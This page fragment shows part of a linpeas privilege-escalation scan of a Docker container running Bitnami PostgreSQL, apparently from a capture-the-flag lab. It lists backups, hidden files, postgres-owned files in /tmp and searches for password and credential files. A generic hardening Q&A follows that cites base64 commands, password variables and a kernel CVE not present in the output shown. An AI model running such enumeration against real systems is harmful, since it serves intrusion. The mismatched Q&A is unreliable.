-rwxr-xr-x 1 root root 0 Mar 19 14:57 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 19 14:57 etc
drwxr-xr-x 1 root root 4096 Mar 19 14:57 home
lrwxrwxrwx 1 root root 7 Mar 28 2024 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Mar 28 2024 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4096 Mar 28 2024 media
drwxr-xr-x 2 root root 4096 Mar 28 2024 mnt
drwxrwxr-x 1 root root 4096 Jun 11 2024 opt
dr-xr-xr-x 391 root root 0 Mar 19 14:57 proc
drwx------ 2 root root 4096 Mar 28 2024 root
drwxr-xr-x 4 root root 4096 Mar 28 2024 run
lrwxrwxrwx 1 root root 8 Mar 28 2024 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Mar 28 2024 srv
dr-xr-xr-x 13 root root 0 Mar 19 14:57 sys

╔══════════╣ Files inside others home (limit 20)


/home/rceflag

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders


drwxr-xr-x 2 root root 4096 Jan 28 2024 /var/backups
total 0

╔══════════╣ Backup files (limited 100)


-rw-r--r-- 1 root root 0 Mar 28 2024
/var/lib/systemd/deb-systemd-helper-enabled/[Link]/dpkg-db-
[Link]
-rw-r--r-- 1 root root 61 Mar 28 2024 /var/lib/systemd/deb-systemd-helper-
enabled/[Link]-also
-rw-r--r-- 1 root root 147 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-
[Link]
-rw-r--r-- 1 root root 138 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-
[Link]
-rwxr-xr-x 1 root root 2569 May 11 2023 /usr/libexec/dpkg/dpkg-db-backup
-rw-r--r-- 1 root root 1602 Jun 6 2024
/opt/bitnami/postgresql/include/server/replication/backup_manifest.h
-rw-r--r-- 1 root root 1055 Jun 6 2024
/opt/bitnami/postgresql/include/server/replication/basebackup.h
-rwxr-xr-x 1 root root 119232 Jun 6 2024
/opt/bitnami/postgresql/bin/pg_basebackup
-rwxr-xr-x 1 root root 97344 Jun 6 2024
/opt/bitnami/postgresql/bin/pg_verifybackup

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)


Found /opt/bitnami/postgresql/share/proj/[Link]

╔══════════╣ Web files?(output limit)

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the
previous check) (limit 70)
-rw-r--r-- 1 root root 220 Apr 23 2023 /etc/skel/.bash_logout
-rw------- 1 root root 0 Mar 28 2024 /etc/.[Link]
-rw-r--r-- 1 root root 0 Mar 19 14:57 /bitnami/postgresql/.user_scripts_initialized
-rw-r--r-- 1 root root 141 Jun 11 2024 /opt/bitnami/.bitnami_components.json
-rw-r--r-- 1 root root 23026 Jun 11 2024 /opt/bitnami/postgresql/.spdx-
[Link]
-rw-r--r-- 1 root root 0 Mar 19 14:57 /opt/bitnami/postgresql/tmp/.initialized
-rw------- 1 postgres postgres 51 Apr 2 18:05 /tmp/.[Link]

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp,


/private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwx------ 1 postgres postgres 1652 Apr 2 17:57 /tmp/[Link]
-rw------- 1 postgres postgres 51 Apr 2 18:05 /tmp/.[Link]
-rwx------ 1 postgres postgres 1666 Apr 2 17:50 /tmp/[Link]
-rwx------ 1 postgres postgres 0 Apr 2 17:51 /tmp/[Link]
-rwx------ 1 postgres postgres 840274 Apr 2 18:00 /tmp/[Link]

╔══════════╣ Searching passwords in history cmd

╔══════════╣ Searching *password* or *credential* files in home (limit 70)


/etc/pam.d/common-password
/opt/bitnami/postgresql/lib/[Link]
/usr/share/pam/common-password
/usr/share/pam/common-password.md5sums
/var/cache/debconf/[Link]
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)

╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'

Common questions

Powered by AI

The PostgreSQL configuration in the observed environment reveals several potential security risks, such as having 'trust' authentication modes enabled in pg_hba.conf, which could allow unauthenticated access to the database. Additionally, environment variables suggesting the presence of plaintext passwords (such as POSTGRESQL_INITSCRIPTS_PASSWORD) further expose the system to unauthorized access. Mitigating these risks involves moving sensitive data to secured secrets management tools, enforcing stronger authentication mechanisms like 'md5' or 'scram-sha-256', and periodically auditing access logs to detect unauthorized access attempts .

Base64 encoding is used in logs to obscure commands or scripts, which can be part of malicious activities like obfuscating potentially harmful commands to avoid detection by intrusion detection/prevention systems. In the context provided, base64-encoded strings decode into shell commands, indicating potential attempts to execute arbitrary code remotely. To counter misuse, implementing strict validation and monitoring of encoded inputs, and deploying network security measures capable of detecting anomalous base64 usage are crucial steps .

SUID (Set User ID) binaries can significantly impact system security as they allow a file to be executed with the permissions of the file's owner. This can be risky if the owner is a privileged user like root, as it potentially allows regular users to execute commands with elevated privileges. Mitigation strategies include regularly auditing these binaries using scripts or tools to identify potentially exploitable files, removing the SUID bit from binaries where it is unnecessary, and keeping the system updated to ensure known vulnerabilities within these binaries are patched .

Environment variables containing sensitive information, such as passwords or API keys, can inadvertently expose critical information to unauthorized users if misconfigured. They highlight a critical security risk because environment variables are often accessible to any running process within a user's session. The exposure of variables like POSTGRESQL_PASSWORD and POSTGRESQL_INITSCRIPTS_PASSWORD poses direct risks of unauthorized access and data breaches. To mitigate these risks, sensitive data should be stored in secured vaults or encrypted, and access to environment variables should be scrutinized and minimized .

Network discovery tools such as 'ping' offer basic capabilities for probing and mapping network environments, which, if misused, can lead to information disclosure about the network's structure and potential weak points. The absence of typical tools like 'ping' may suggest security measures to limit exposure, but the presence of alternatives, such as 'bash' for network tasks, may pose a risk of misuse if stringent checks are not in place. To secure the system, network discovery activities should be tightly controlled through permissions and audit logging, and unnecessary network tools should be removed from the system .

Docker is used in the deployment environment to provide isolated application containers, illustrated by its presence in running multiple services observed through 'docker-proxy' commands. Security implications of using Docker include potential container breakout vulnerabilities, where a malicious user could escape the containerized environment into the host system. To mitigate these risks, it's crucial to follow best practices such as using official and minimal base images, managing Docker user privileges properly, regularly updating Docker components, and employing security scanning tools to check for vulnerabilities within containers .

System vulnerability to kernel exploits can be inferred from the presence of specific kernel versions and the available unpatched CVEs, such as CVE-2022-32250, which are linked with particular kernel versions like 5.15.0. Managing such vulnerabilities begins with ensuring the system is regularly updated with the latest security patches, specifically kernel updates, and disabling unnecessary kernel modules or features that might expose exploit vectors. Monitoring security advisories and applying mitigations such as secure boot configurations and integrity verification are also key components in managing these vulnerabilities .

Securing a Linux-based system involves several critical steps outlined in the privilege escalation checklist. These steps include monitoring writable directories for inappropriate files, reviewing system information such as OS version and installed software for known vulnerabilities, ensuring secure configurations for user and group permissions, and checking for uninstalled or misconfigured network tools which might allow unauthorized access. In addition, analyzing weak or default passwords in environment variables, ensuring proper sudo configurations, and verifying system logs for unauthorized access or actions are crucial for maintaining a secure system .

Potential privilege escalation vectors in the system may include misconfigurations in user and group permissions, such as incorrect 'sudo' privileges or writable PATHs that allow insertion of malicious scripts to gain elevated access. The presence of certain environment variables and writable directories can also indicate possible vectors. Ensuring restrictive access to sensitive directories and properly configuring 'sudo' rights by auditing '/etc/sudoers' and user group memberships can mitigate privilege escalation risks. Continuous monitoring and regular permission audits are necessary to prevent exploitation .

The use of shared libraries, such as libnss_wrapper.so in the environment variables, requires careful security considerations to prevent exploitation. Such libraries must be sourced from trusted repositories to avoid injecting malicious code. Regular assessments to ensure libraries are up-to-date, verifying their integrity using checksums, and applying security patches to the shared libraries proactively are key measures in maintaining security. Additionally, monitoring and controlling access to these libraries helps prevent unauthorized manipulations .

You might also like